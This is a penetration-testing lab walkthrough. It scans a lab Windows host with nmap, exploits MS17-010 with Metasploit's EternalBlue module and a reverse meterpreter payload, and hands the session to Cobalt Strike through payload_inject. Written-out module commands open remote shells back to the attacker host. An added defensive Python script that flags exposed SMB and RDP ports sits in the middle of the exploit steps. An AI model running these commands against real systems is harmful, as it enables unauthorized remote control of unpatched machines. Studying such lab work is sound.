0x00 Environment Introduction
Attacker: 192.168.60.129 (kali)
Victim machine: 192.168.60.131
Tools: nmap, Metasploit, Cobalt Strike
0x01 Attack preparation
First, deploy the victim host and configure its network adapter so that the two machines can reach each other.
Next, deploy a web application service on it so that it looks like a real application server.
0x02 Pre-attack stage
Information gathering with nmap discovered open ports 445 and 3389 and the operating system version:
nmap -A 192.168.60.131
The scan showed that port 445 was open; a detection tool was then used to check for the MS17-010 vulnerability, and it was found to be present.
First, open msf to exploit the vulnerability:
1. Search for the exploit module
2. Exploit the vulnerability
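As an added example that is not part of the original write-up, the following Python script parses nmap XML output (nmap -oX) and flags hosts exposing SMB and RDP, with the defender-side follow-up for each; the XML sample is constructed by hand to match the ports reported above.

```python
import xml.etree.ElementTree as ET

# Constructed sample of nmap XML output for the lab host described above.
# The port states mirror what the write-up reports; the XML itself is hand-written.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <status state="up"/>
    <address addr="192.168.60.131" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server"/></port>
      <port protocol="tcp" portid="80"><state state="closed"/><service name="http"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Ports whose exposure needs follow-up: SMB (MS17-010 patch status, SMBv1) and RDP.
HIGH_RISK_PORTS = {
    445: "SMB exposed: confirm MS17-010 patch is installed and disable SMBv1",
    3389: "RDP exposed: restrict at the firewall, require NLA and MFA",
}

def parse_open_ports(xml_text):
    """Return {ipv4: sorted list of open TCP ports} from nmap XML output."""
    root = ET.fromstring(xml_text)
    result = {}
    for host in root.findall("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        open_ports = [int(p.get("portid")) for p in host.findall("ports/port")
                      if p.get("protocol") == "tcp"
                      and p.find("state").get("state") == "open"]
        result[addr.get("addr")] = sorted(open_ports)
    return result

def exposure_findings(xml_text):
    """Map each host to the remediation notes for its high-risk open ports."""
    findings = {}
    for ip, ports in parse_open_ports(xml_text).items():
        notes = [HIGH_RISK_PORTS[p] for p in ports if p in HIGH_RISK_PORTS]
        if notes:
            findings[ip] = notes
    return findings

if __name__ == "__main__":
    for ip, notes in exposure_findings(SAMPLE_NMAP_XML).items():
        print(ip)
        for note in notes:
            print("  -", note)
```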
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/reverse_tcp
set RHOST 192.168.60.131
set LHOST 192.168.60.129
This gives a meterpreter session.
Then use Cobalt Strike
If you find msf's functions too limited, you can also link it with Cobalt Strike.
You now have an MSF meterpreter session, with session id 1.
Create a new listener in Cobalt Strike and configure it as follows:
Set the following in MSF:
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost 192.168.60.129
set lport 12388
set session 1
You will then see the Meterpreter session forwarded from MSF appear in Cobalt Strike.
Finally, the post-exploitation modules integrated in Cobalt Strike can be used for further testing.
Note: only Meterpreter-type sessions can be passed to Cobalt Strike this way.
0x03 Summary
Detailed information gathering during a test opens up different penetration routes; only by correlating and reusing the gathered information can the results of a test be amplified effectively.